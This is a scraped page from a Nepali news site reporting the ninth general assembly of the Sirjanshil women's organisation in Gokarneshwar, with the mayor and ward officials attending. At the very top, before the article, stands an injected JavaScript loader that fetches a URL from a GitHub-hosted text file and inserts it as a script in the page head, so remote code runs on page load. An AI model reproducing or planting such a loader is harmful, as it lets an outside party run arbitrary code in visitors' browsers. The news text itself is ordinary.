;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सिर्जनशील महिला संस्थाको ९ औं साधारण सभा – जुनेली न्युज
सोमवार, बैशाख २, २०८२
  • होमपेज
  • सिर्जनशील महिला संस्थाको ९ औं साधारण सभा
Breaking News

सिर्जनशील महिला संस्थाको ९ औं साधारण सभा

जुनेली न्युज, काठमाडौं।

गोकर्णेश्वर नगरपालिका वडा नं ३ मा अवस्थित सिर्जनशील महिला संस्थाको ९औं साधारण सभा सम्पन्न भएको छ। लामो समय देखि महिलाको हक हितको निमित्त का गरेको उक्त संस्थाले राष्ट्रिय सहिद पार्क जगडोल मा भएको हो।

साथै सो कार्यक्रममा नव निर्वाचित जनप्रतिनिधिहरुलाई सम्मान समेत गरेको छ। कार्यक्रममा गोकर्णेश्वर नगरपालिका मेयर दीपक रिसाल, उप मेयर सान्नानी लामा, वडा नं ३ का वडा अध्यक्ष मुरारी कुइकेल, ४ का वडा अध्यक्ष जयराम महत  अन्य वडा सदस्यहरूको पनि उपस्थिति रहेको थियो।

फेसबुक प्रतिक्रियाहरु